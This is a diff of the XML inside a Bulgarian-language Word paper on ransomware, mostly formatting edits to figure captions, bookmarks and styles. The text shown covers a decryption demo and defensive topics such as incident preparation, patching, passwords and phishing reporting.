+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>document2.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> след декриптирането.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t>Personal notes and passwords (just kidding, this is a demo).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>22</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>: notes.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> след декриптирането.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="0E2841" w:themeColor="text2"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc223385518"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>QR code</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> към имплементацията:</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56A41F2E" wp14:editId="7A7DB2D4">
+            <wp:extent cx="4763135" cy="4763135"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="998859011" name="Picture 2" descr="QR Code Image"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6" descr="QR Code Image"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4763135" cy="4763135"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223361345"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc223385519"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -4447,7 +7310,7 @@
         </w:rPr>
         <w:t>ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4498,7 +7361,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc223361346"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc223385520"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -4511,7 +7374,7 @@
       <w:r>
         <w:t xml:space="preserve"> инциденти</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4712,7 +7575,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc223361347"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc223385521"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -4732,7 +7595,7 @@
       <w:r>
         <w:t>уязвимости</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5010,6 +7873,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:ind w:firstLine="360"/>
         <w:jc w:val="center"/>
       </w:pPr>
@@ -5019,9 +7883,9 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A5770E8" wp14:editId="609A8FB0">
-            <wp:extent cx="4953000" cy="1962200"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2EDD25" wp14:editId="03E6AB96">
+            <wp:extent cx="4660900" cy="1846481"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
             <wp:docPr id="125626481" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -5034,7 +7898,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5042,7 +7906,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4973747" cy="1970419"/>
+                      <a:ext cx="4688513" cy="1857420"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5057,74 +7921,143 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:jc w:val="left"/>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Фиг. 8 – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">диаграма описваща превенция на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>internet-facing vulnerabilities</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Експлоатация на услуги</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc223382615"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>23</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Д</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>иаграма</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>описваща</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>превенция</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> internet-facing vulnerabilities. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Експлоатация</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>услуги</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5133,9 +8066,9 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FDC3FD6" wp14:editId="29939F6A">
-            <wp:extent cx="5219700" cy="2015498"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D222F0" wp14:editId="32932ED9">
+            <wp:extent cx="4806950" cy="1856122"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="383783366" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -5148,7 +8081,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5156,7 +8089,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5231680" cy="2020124"/>
+                      <a:ext cx="4829137" cy="1864689"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5168,37 +8101,60 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">(Фиг. 9 – диаграма описваща превенция на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>internet-facing vulnerabilities</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="_Toc223382616"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>: Д</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">иаграма описваща превенция на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>internet-facing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vulnerabilities</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:t>. Ограничаване на достъпа</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5212,7 +8168,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc223361348"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc223385522"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
@@ -5220,7 +8176,7 @@
       <w:r>
         <w:t>пароли</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5609,7 +8565,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5632,19 +8588,41 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="left"/>
+        <w:pStyle w:val="Caption"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(Фиг. 10 – диаграма защо използването на пароли по подразбиране не е препоръчително)</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="28" w:name="_Toc223382617"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>25</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Диаграма защо използването на пароли по подразбиране не е препоръчително.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5660,7 +8638,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="12" w:name="_Toc223361349"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc223385523"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5671,7 +8649,7 @@
       <w:r>
         <w:t>атаки</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5884,7 +8862,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5907,59 +8885,49 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="left"/>
+        <w:pStyle w:val="Caption"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(Фиг. 11 – показва как се </w:t>
+      <w:bookmarkStart w:id="30" w:name="_Toc223382618"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>26</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Показва как се </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
         <w:t>репортва</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> фишинг имейл в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Outlook</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> фишинг имейл в Outlook.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5972,6 +8940,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="31" w:name="_Toc223385524"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Други форми на </w:t>
@@ -5982,6 +8951,7 @@
         </w:rPr>
         <w:t>Social Engineering</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6200,7 +9170,7 @@
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="13" w:name="_Toc223361350" w:displacedByCustomXml="next"/>
+    <w:bookmarkStart w:id="32" w:name="_Toc223385525" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -6228,7 +9198,7 @@
           <w:r>
             <w:t>Цитирани източници</w:t>
           </w:r>
-          <w:bookmarkEnd w:id="13"/>
+          <w:bookmarkEnd w:id="32"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -6782,6 +9752,11 @@
           </w:pPr>
         </w:p>
         <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
           <w:r>
             <w:rPr>
               <w:b/>
@@ -8892,6 +11867,114 @@
       <w:ind w:left="240"/>
     </w:pPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HTMLPreformattedChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DD2032"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
+    <w:name w:val="HTML Preformatted Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="HTMLPreformatted"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00DD2032"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Caption">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="008874DA"/>
+    <w:pPr>
+      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="0E2841" w:themeColor="text2"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TableofFigures">
+    <w:name w:val="table of figures"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00437A39"/>
+    <w:pPr>
+      <w:spacing w:after="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
+    <w:name w:val="code"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="codeChar"/>
+    <w:qFormat/>
+    <w:rsid w:val="00437A39"/>
+    <w:pPr>
+      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+      <w:spacing w:before="240"/>
+      <w:jc w:val="left"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
+    <w:name w:val="code Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="code"/>
+    <w:rsid w:val="00437A39"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+      <w:lang w:val="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B23FDE"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="480"/>
+    </w:pPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -284,11 +284,9 @@
           <w:kern w:val="0"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -297,12 +295,11 @@
           <w:kern w:val="0"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Какво</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Какво представлява </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -311,12 +308,11 @@
           <w:kern w:val="0"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -325,12 +321,11 @@
           <w:kern w:val="0"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>представлява</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
